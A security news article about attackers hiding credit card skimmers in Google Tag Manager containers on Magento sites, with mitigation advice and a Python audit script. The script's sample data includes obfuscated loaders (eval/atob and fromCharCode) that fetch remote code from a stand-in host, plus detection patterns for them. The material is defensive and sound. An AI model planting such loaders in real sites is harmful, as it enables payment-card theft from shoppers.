Threat Actors Exploit Google Tag Manager to Deploy Credit Card Skimmers on Magento Websites

Cybercriminals have been observed leveraging Google Tag Manager (GTM) to deliver credit card skimmer malware, targeting e-commerce websites running on the Magento platform.

How the Attack Works

According to website security company Sucuri, attackers are embedding malicious scripts within GTM containers. Although the injected code looks like a standard Google Analytics or advertising tag, it actually carries an obfuscated backdoor that gives the attackers persistent access to the compromised site.

The attack method involves:

  • Injecting a malicious GTM loader script into the Magento site's database (the cms_block.content column).

  • Embedding encoded JavaScript payloads within GTM tags to execute credit card skimming.

  • Stealing sensitive payment data from checkout pages.

  • Transmitting stolen credit card information to attacker-controlled remote servers.

Sucuri initially identified six infected websites but has since reported that three remain actively compromised, all linked to the GTM identifier GTM-MLHK2N68.

Google Tag Manager as an Attack Vector

Google Tag Manager (GTM) is a legitimate service used for managing various tracking codes, such as Google Analytics and Facebook Pixel, without requiring direct changes to a website's source code. That same convenience is what attackers abuse: in this campaign they injected malicious JavaScript into a compromised site's Magento database, specifically the cms_block.content column, where a GTM loader looks no different from the legitimate tracking snippets site owners routinely place there, so the injection is easily overlooked during a review.

Once executed, the JavaScript:

  1. Harvests credit card details entered by customers on checkout pages.

  2. Sends the stolen payment data to an external command-and-control (C2) server controlled by attackers.

Ongoing Threat of Google Tag Manager Abuse

This is not the first time Google Tag Manager has been misused by threat actors:

  • In April 2018, Sucuri discovered that GTM was being abused for malvertising, where attackers inserted malicious ads to distribute malware.

  • More recently, attackers have used GTM-based skimming attacks to target major e-commerce platforms, taking advantage of third-party scripts that site owners commonly integrate for analytics and advertising.

Recent Trends in Web-Based Malware Attacks

This attack comes just weeks after Sucuri uncovered another campaign targeting WordPress sites:

  • Attackers exploited vulnerabilities in plugins or hijacked admin accounts to install malware.

  • The malware redirected site visitors to malicious URLs, leading to phishing pages or exploit kits.

Mitigation Strategies for Website Owners

Given the stealthy nature of these attacks, e-commerce site administrators should take proactive security measures to prevent GTM-based malware infections. Recommended actions include:

  1. Regularly audit GTM configurations

    • Check for unauthorized GTM containers or unexpected script modifications.

  2. Restrict access to GTM and third-party scripts

    • Implement a strict Content Security Policy (CSP). A policy that simply allowlists www.googletagmanager.com does not stop a malicious tag served from your own container, so pair it with nonces for inline scripts (so injected <script> blocks in CMS content are refused) and restrict connect-src, img-src and form-action so harvested card data cannot be sent to arbitrary hosts.

  3. Monitor Magento database tables for anomalies

    • Pay special attention to cms_block.content and other places where attackers can inject code that ends up in every page, such as the core_config_data entries that hold header and footer scripts.

  4. Use real-time security monitoring tools

    • Solutions like Web Application Firewalls (WAF) and Intrusion Detection Systems (IDS) can help detect malicious script injections.

  5. Regular security scans and malware removal

    • Conduct automated security scans using tools like Sucuri SiteCheck or Google Search Console's Security Issues report.

  6. Ensure all Magento extensions and plugins are up to date

    • Outdated software often contains vulnerabilities that attackers exploit for initial access.
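The two audit checks above (mitigation items 1 and 3, and the cms_block.content injection point described under "Google Tag Manager as an Attack Vector") can be scripted. The following is an added example, not Sucuri's, Magento's or Google's code: it scans Magento cms_block rows for GTM loaders that reference a container you do not own, for script tags loaded from unexpected hosts and for common obfuscation constructs, and it runs the same indicator scan over the Custom HTML tags in a GTM container export. The sample rows and the export are constructed for the example, and the export layout it assumes (containerVersion.tag[] with Custom HTML tags of type "html" whose code sits under parameter[].key == "html") is an assumption about the export format, so verify it against an export of your own container.

```python
"""Added audit example (not Sucuri's, Magento's or Google's code).
Assumption: a GTM container export is JSON with containerVersion.tag[], where
Custom HTML tags have type "html" and their code under parameter[].key == "html".
All sample data below is constructed for this example, not real site content.
"""
import base64
import json
import re
from urllib.parse import urlparse

GTM_ID_RE = re.compile(r"GTM-[A-Z0-9]{4,10}")
SCRIPT_SRC_RE = re.compile(r"<script[^>]*\ssrc\s*=\s*['\"]([^'\"]+)['\"]", re.I)

# Constructs commonly used to hide or stage a second payload inside a tag.
# A hit is a reason to read the tag by hand, not proof of compromise.
SUSPICIOUS_PATTERNS = {
    "eval": re.compile(r"\beval\s*\("),
    "atob": re.compile(r"\batob\s*\("),
    "fromCharCode": re.compile(r"String\.fromCharCode"),
    "unescape": re.compile(r"\bunescape\s*\("),
    "dynamic_script": re.compile(r"createElement\s*\(\s*['\"]script['\"]"),
    "long_base64": re.compile(r"[A-Za-z0-9+/]{80,}={0,2}"),
}


def suspicious_indicators(code: str) -> list[str]:
    """Names of the SUSPICIOUS_PATTERNS found in code, in table order."""
    return [name for name, pat in SUSPICIOUS_PATTERNS.items() if pat.search(code)]


def audit_cms_blocks(rows, allowed_gtm_ids, allowed_script_hosts):
    """rows: (block_id, identifier, content) tuples, e.g. the result of
    SELECT block_id, identifier, content FROM cms_block.
    Returns one finding per row that references a GTM container outside
    allowed_gtm_ids, loads a script from a host outside allowed_script_hosts,
    or matches an obfuscation indicator."""
    findings = []
    for block_id, identifier, content in rows:
        unknown_ids = sorted(set(GTM_ID_RE.findall(content)) - set(allowed_gtm_ids))
        hosts = {urlparse(src).hostname for src in SCRIPT_SRC_RE.findall(content)}
        foreign_hosts = sorted(h for h in hosts if h and h not in allowed_script_hosts)
        indicators = suspicious_indicators(content)
        if unknown_ids or foreign_hosts or indicators:
            findings.append({"block_id": block_id, "identifier": identifier,
                             "unknown_gtm_ids": unknown_ids,
                             "foreign_script_hosts": foreign_hosts,
                             "indicators": indicators})
    return findings


def audit_gtm_export(export_json: str) -> list[dict]:
    """Every Custom HTML tag in a container export, with its indicators."""
    doc = json.loads(export_json)
    results = []
    for tag in doc.get("containerVersion", {}).get("tag", []):
        if tag.get("type") != "html":
            continue
        html = next((p.get("value", "") for p in tag.get("parameter", [])
                     if p.get("key") == "html"), "")
        results.append({"tagId": tag.get("tagId"), "name": tag.get("name"),
                        "indicators": suspicious_indicators(html)})
    return results


# --- constructed sample data -------------------------------------------------
GTM_LOADER = ("<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':"
              "new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],"
              "j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;"
              "j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;"
              "f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','%s');"
              "</script>")
# An encoded second stage, as the article describes: the visible tag only shows eval(atob(...)).
SECOND_STAGE = ("var s=document.createElement('script');"
                "s.src='https://stats-cdn.example/l.js';document.head.appendChild(s);")
ENCODED_TAG = "<script>eval(atob('%s'));</script>" % base64.b64encode(SECOND_STAGE.encode()).decode()

SAMPLE_ROWS = [
    (1, "footer_links", "<p>Free shipping on orders over $50.</p>"),
    (2, "gtm_head", GTM_LOADER % "GTM-ABCD123"),                            # the site's own container
    (3, "promo_banner", "<div>Sale!</div>" + GTM_LOADER % "GTM-ZZZZ999"),   # a second, unknown container
    (4, "checkout_note", ENCODED_TAG),
    (5, "sidebar", '<script src="https://stats-cdn.example/t.js"></script>'),
]

SAMPLE_EXPORT = json.dumps({
    "exportFormatVersion": 2,
    "containerVersion": {
        "container": {"publicId": "GTM-ABCD123"},
        "tag": [
            {"tagId": "1", "name": "GA4 config", "type": "gaawc",  # non-HTML tag, skipped
             "parameter": [{"type": "TEMPLATE", "key": "measurementId", "value": "G-EXAMPLE1"}]},
            {"tagId": "2", "name": "Newsletter banner", "type": "html",
             "parameter": [{"type": "TEMPLATE", "key": "html",
                            "value": "<script>document.body.classList.add('nl-ready');</script>"}]},
            {"tagId": "3", "name": "Analytics helper", "type": "html",
             "parameter": [{"type": "TEMPLATE", "key": "html",
                            "value": "<script>var s=document.createElement('script');"
                                     "s.src=String.fromCharCode(104,116,116,112,115)+'://stats-cdn.example/l.js';"
                                     "document.head.appendChild(s);</script>"}]},
        ],
    },
})

if __name__ == "__main__":
    for f in audit_cms_blocks(SAMPLE_ROWS, {"GTM-ABCD123"}, {"www.googletagmanager.com"}):
        print("cms_block:", f)
    for t in audit_gtm_export(SAMPLE_EXPORT):
        print("gtm_tag:", t)
```

Run against real data by feeding `audit_cms_blocks` the rows of `SELECT block_id, identifier, content FROM cms_block` and `audit_gtm_export` the JSON you download from the container's Admin > Export Container page, with your own container id and script hosts in the allowlists. Rows 3, 4 and 5 are reported (unknown container id, eval/atob with a long base64 blob, and an external script host respectively), the site's own loader in row 2 is not, and in the export only tag 3 carries indicators. The indicator list is deliberately short; treat any hit as a prompt to read the tag, since legitimate vendor tags occasionally use the same constructs.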

Conclusion

The use of Google Tag Manager as a malware delivery system highlights the growing sophistication of modern credit card skimming attacks. As e-commerce platforms like Magento continue to be high-value targets, businesses must adopt strict security measures to protect their customers’ financial data.

By auditing GTM configurations, monitoring database activity, and keeping software up to date, website owners can significantly reduce the risk of credit card skimmers compromising their platforms.